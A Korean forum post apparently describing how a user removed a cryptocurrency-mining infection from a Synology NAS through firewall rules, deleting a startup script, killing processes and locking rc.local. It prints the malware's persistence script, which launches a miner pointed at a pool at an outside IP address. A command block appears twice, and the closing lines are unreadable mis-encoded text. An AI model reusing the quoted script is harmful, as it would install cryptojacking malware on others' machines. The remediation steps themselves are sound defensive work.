최근 3일동안 해킹이 발생하지 않아서 "이건가?!" 하는 생각에 개인적인 방법을 공유합니다.
(공유이기도 하고 다음에 혹시 재설치 할 경우 다시보려는 기록이기도 합니다^^;)
1. NAS의 방화벽 설정에서 기본 서비스포트를 제외한 나머지를 모두 차단합니다.
방화벽은 설정의 순서가 중요합니다. 허용을 위에 거부를 아래에 놓아야합니다.
<아래그림은 서비스 포트 접속 허용 설정화면>
2. 자동차단을 활성화 해둡니다.
붉은색은 주의해서 실행해야할 명령입니다.
## S99p.sh를 찾아서 내용 확인하고 지웁니다. 내용에서 확인되는 PWNED는 소심하게 이름을 바꿨어요.
>cd /
>find / -name S99p.sh
/usr/syno/etc.defaults/rc.d/S99p.sh
> cat /usr/syno/etc.defaults/rc.d/S99p.sh
#!/bin/sh
su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp
su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp
>mv PWNED PWNED_bak
>rm /usr/syno/etc.defaults/rc.d/S99p.sh
## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다.
>find /proc -name "stat" | xargs grep "httpd-log.pid"
## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다.
>kill 123456 (검색된 PID)
>cd /
>find / -name S99p.sh
/usr/syno/etc.defaults/rc.d/S99p.sh
> cat /usr/syno/etc.defaults/rc.d/S99p.sh
#!/bin/sh
su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp
su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp
>mv PWNED PWNED_bak
>rm /usr/syno/etc.defaults/rc.d/S99p.sh
## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다.
>find /proc -name "stat" | xargs grep "httpd-log.pid"
## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다.
>kill 123456 (검색된 PID)
## lolz 스크립트가 포함된 파일을 찾아봅니다.
>find / -name "rc.*" | xargs grep "lolz"
>find / -name "profile" | xargs grep "lolz"
>find / -name "*.sh" | xargs grep "lolz"
## 위 검색에서 발견된 파일이 있다면 vi로 편집하거나 삭제하세요. (저는 발견되는게 없었습니다)
## rc.local파일이 오염됐는지 확인해서 오염됐다면 수정한 후 실행/수정 불가로 만듭니다. (위 S99p.sh와 유사하게 오염됐더군요)
>cat /etc/rc.local
>chmod -wx /etc/rc.local
서버를 재시작해봅니다.. CPU점유를 확인해봅니다.
다른 게시물을보니, 모바일(DS finder)에서는 CPU점유율이 정확하게 판독된다고 하네요.
좀비프로세스가 어디서 뜨는지 찾으려고 구동될때 녹화해서 한프레임씩 확인했었습니다.
rc.local가 부팅시 변조되는것 같아서 마지막처럼 수정/실행 불가로 한건데.. 맞겠지요;
이렇게 한 후엔 재시작해도 좀비 프로세스가 뜨질 않네요. ^^;
À§ ó·³ ±âº»¼ºñ½º Æ÷Æ®(80, 443, 5000, 5001)°¡ °è¼Ó ¿·Á ÀÖ°í, º¸¾ÈÆÐÄ¡°¡ ¾ÈµÇ¾î ÀÖ´Ù¸é
¿©ÀüÈ÷ ±¸¸ÛÀº ¿·Á ÀÖ´Â °Í °°½À´Ï´Ù ;;
±×·¯°íº¸´Ï ¿ÖÀϱî?? ¶ó´Â ÀDZ¸½ÉÀÌ µå³×¿ä. ¸îÀÏ ´õ µÎ°í ºÁ¾ß°Ú½À´Ï´Ù.
±×¸®°í À¥ Á¢¼ÓÀº VPNÀ¸·Î....
¸îÀÏ µÎ°í ºÁ¾ß°Ú½À´Ï´Ù.